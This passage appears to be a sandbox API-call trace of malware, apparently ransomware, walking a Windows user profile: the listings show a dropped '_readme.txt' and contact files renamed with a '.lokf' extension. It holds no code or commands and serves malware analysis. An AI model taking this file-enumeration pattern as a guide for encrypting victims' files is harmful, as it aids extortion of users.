(HeapHandle=0x6e0000, Flags=0x0, Size=0x50) returned 0x322ef50 [0146.608] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x50) returned 0x322efa8 [0146.608] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xa8) returned 0x31e15a8 [0146.608] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x20528a90, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x20528a90, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 1 [0146.608] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Downloads", cAlternateFileName="DOWNLO~1")) returned 1 [0146.608] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Favorites", cAlternateFileName="FAVORI~1")) returned 1 [0146.609] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Links", cAlternateFileName="")) returned 1 [0146.609] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x2914fe20, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Local Settings", cAlternateFileName="LOCALS~1")) returned 1 [0146.609] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2059aeb0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x2059aeb0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Music", cAlternateFileName="")) returned 1 [0146.609] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x290dda00, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x290dda00, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x290dda00, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Documents", cAlternateFileName="MYDOCU~1")) returned 1 [0146.609] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29103b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29103b60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29103b60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NetHood", cAlternateFileName="")) returned 1 [0146.609] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x24b6fdf0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x24b6fdf0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x100000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT", cAlternateFileName="")) returned 1 [0146.609] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f60c40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f60c40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x24b49c90, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x40000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ntuser.dat.LOG1", cAlternateFileName="NTUSER~1.LOG")) returned 1 [0146.609] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f60c40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f60c40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28f60c40, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ntuser.dat.LOG2", cAlternateFileName="NTUSER~2.LOG")) returned 1 [0146.609] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f60c40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f60c40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x40b0f7f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", cAlternateFileName="NTUSER~1.BLF")) returned 1 [0146.609] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f86da0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f86da0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x40b0f7f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", cAlternateFileName="NTUSER~1.REG")) returned 1 [0146.609] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f86da0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f86da0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x40b0f7f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", cAlternateFileName="NTUSER~2.REG")) returned 1 [0146.609] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cd94e0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x14, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ntuser.ini", cAlternateFileName="")) returned 1 [0146.609] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x20822610, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x20822610, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Pictures", cAlternateFileName="")) returned 1 [0146.609] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29103b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29103b60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29103b60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PrintHood", cAlternateFileName="PRINTH~1")) returned 1 [0146.609] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29129cc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29129cc0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29129cc0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Recent", cAlternateFileName="")) returned 1 [0146.609] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d22d5a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Saved Games", cAlternateFileName="SAVEDG~1")) returned 1 [0146.609] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28de3e80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Searches", cAlternateFileName="")) returned 1 [0146.609] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29129cc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29129cc0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29129cc0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SendTo", cAlternateFileName="")) returned 1 [0146.609] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29129cc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29129cc0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29129cc0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Start Menu", cAlternateFileName="STARTM~1")) returned 1 [0146.609] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x2914fe20, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Templates", cAlternateFileName="TEMPLA~1")) returned 1 [0146.609] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x208bab90, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x208bab90, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Videos", cAlternateFileName="")) returned 1 [0146.609] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ece8a70, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1ece8a70, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ece8a70, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0146.609] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ece8a70, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1ece8a70, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ece8a70, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0146.609] FindClose (in: hFindFile=0x3220d58 | out: hFindFile=0x3220d58) returned 1 [0146.610] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0146.610] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0146.610] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0146.610] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0146.610] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0146.610] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0146.610] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0146.610] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0146.610] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0146.610] PathFindFileNameW (pszPath="") returned="" [0146.610] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\*", lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3220d58 [0146.610] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0146.610] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x59e520b0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x59e520b0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Local", cAlternateFileName="")) returned 1 [0146.610] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x68cb4a40, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x68cb4a40, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LocalLow", cAlternateFileName="")) returned 1 [0146.610] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x748ef30, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x748ef30, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Roaming", cAlternateFileName="")) returned 1 [0146.610] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x748ef30, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x748ef30, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Roaming", cAlternateFileName="")) returned 0 [0146.610] FindClose (in: hFindFile=0x3220d58 | out: hFindFile=0x3220d58) returned 1 [0146.610] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0146.610] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\") returned="Application Data\\" [0146.610] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0146.610] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0146.611] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0146.611] PathFindFileNameW (pszPath="") returned="" [0146.611] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\*", lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x748ef30, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x748ef30, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Roaming", cAlternateFileName="")) returned 0xffffffff [0146.611] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0146.611] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\") returned="Contacts\\" [0146.611] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0146.611] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0146.611] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0146.611] PathFindFileNameW (pszPath="") returned="" [0146.611] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\*", lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x1ffcd910, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ffcd910, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3220d58 [0146.611] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x1ffcd910, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ffcd910, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0146.611] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2ea7ef20, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2ea7ef20, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x1fee90d0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x5e8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Aclviho ASldjfl.contact.lokf", cAlternateFileName="ACLVIH~1.LOK")) returned 1 [0146.611] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x1ff0f230, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x10c6c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Administrator.contact.lokf", cAlternateFileName="ADMINI~1.LOK")) returned 1 [0146.611] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaa5080, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaa5080, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x1ff5b4f0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x5e1, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="asdlfk poopvy.contact.lokf", cAlternateFileName="ASDLFK~1.LOK")) returned 1 [0146.611] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eacb1e0, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eacb1e0, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x1ff5b4f0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x5e7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="chucu jadnvk.contact.lokf", cAlternateFileName="CHUCUJ~1.LOK")) returned 1 [0146.611] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x19c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0146.611] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaf1340, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaf1340, 